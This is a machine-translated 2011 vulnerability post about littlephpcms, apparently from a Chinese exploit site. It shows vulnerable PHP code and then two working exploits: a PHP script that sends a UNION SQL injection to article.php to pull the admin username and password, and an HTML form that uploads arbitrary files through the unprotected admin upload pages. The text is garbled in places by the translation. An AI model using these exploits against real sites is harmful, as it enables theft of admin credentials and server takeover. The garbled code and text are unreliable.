littlephpcms multiple injection/upload/sensitive information leakage issues-vulnerability warning-the black bar safety net

2011-10-03T00:00:00
ID MYHACK58:62201131989
Type myhack58
Reporter 佚名
Modified 2011-10-03T00:00:00

Description

Document classification: script Defense/web apps Published time: 2011-9-30 9:2 6:0 5 Vulnerability added: black kid|attention[7 1] Station search: littlephpcms multiple injection/upload/sensitive information leakage issue Vulnerability neighbor: DeDeCMS(weaving dreams)variable overwrite 0day getshell | WordPress2. 8. 7 The following version of the WP Bannerize pluginSQL injection non-security vulnerabilities coding [L][S-1 5 9 6]

[littlephpcms multiple injection/upload/sensitive information leakage problem full]

#####################################################

Title: littlephpcms multiple injection,upload, information leakage and other vulnerabilities

Time: 2011-09-20

Team:makebugs

Author: the Black kid

// pageArt.php

//..A slightly $column = $_POST["column"]; $rownum = $_POST["rownum"]; $sql = " select id,title,addtime from lpc_article where column_id=".$ column; //..A slightly Other similar documents..slightly

Exp:

<? php error_reporting(E_ERROR); print_r(" +-----------------------+ Sql injection Vul Exploit

Exp :cfking Home: www.webvul.com +-----------------------+ ");

if ($argc < 2) { print_r(" Usage: php ".$ argv[0]." host /path Example: php ".$ argv[0]." www.webvul.com test "); die(); } ob_start(); $host = $argv[1]; $path= $argv[2]; $sock = fsockopen($host, 8 0, $errno, $errstr, 3 0); if (!$ sock) die("$errstr ($errno)\n"); fwrite($sock, "GET /article. php? id=2 5 5%20and%2 0 1=2%20union+select+0,concat(0x63666B696E677339307365637E,uname,0x2D,upass,0x7E31),0,0,0,0,0,0+from+lpc_admin+LIMIT+0,1– HTTP/1.1\r\n"); fwrite($sock, "Host: $host\r\n"); fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/2 0 1 0 0 1 0 1 For Firefox/6.0.2\r\n"); fwrite($sock, "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8\r\n"); fwrite($sock, "Accept-Language: EN-us,EN;q=0.5\r\n"); fwrite($sock, "Connection: keep-alive\r\n\r\n"); $headers = ""; while ($str = trim(fgets($sock, 1 0 2 4))) $headers .= "$str\n"; $body = ""; while (! feof($sock)) $body .= fgets($sock, 1 0 2 4); fclose($sock); ob_end_flush(); //print_r($body); if (strpos($body, "cfkings90sec") !== false) { preg_match("/cfkings90sec~(.*?)~ 1/", $body, $arr); $result=explode("-",$arr[1]); print_r("Exploit Success! \nusername:".$ result[0]."\ npassword:".$ result[1]."\ n");

} else{ print_r("Exploit Failed! \n"); } ?& gt;

File upload: Vulnerability file :admin/column/upload.php :admin/Article/upload.php Code:

$upload_dir = "../../uploads/"; $file_path = $upload_dir . $_FILES["myfile"]["name"]; $MAX_SIZE = 2 0 0 0 0 0 0 0; echo $_POST["buttoninfo"]; ......

if($_FILES["myfile"]["size"]>$MAX_SIZE) echo "Upload File size exceeds a predetermined size";

if($_FILES["myfile"]["size"] == 0) echo "please select the uploaded file";

if(! move_uploaded_file( $_FILES["myfile"]["tmp_name"], $file_path)) echo "copy file failed, please re-upload";

The two files are no any limits!

Exp:

<meta http-equiv="Content-Type" content="text/html; charset=gb2312" /> <form enctype="multipart/form-data" action="http://www.sitedirsec.com/admin/column/upload.php" method="post"> <p>after uploading the site with the directory/uploads/your uploaded file name<p><br> <input type="file" name="myfile" size="2 0"> <input type="submit" value="Upload"> </form>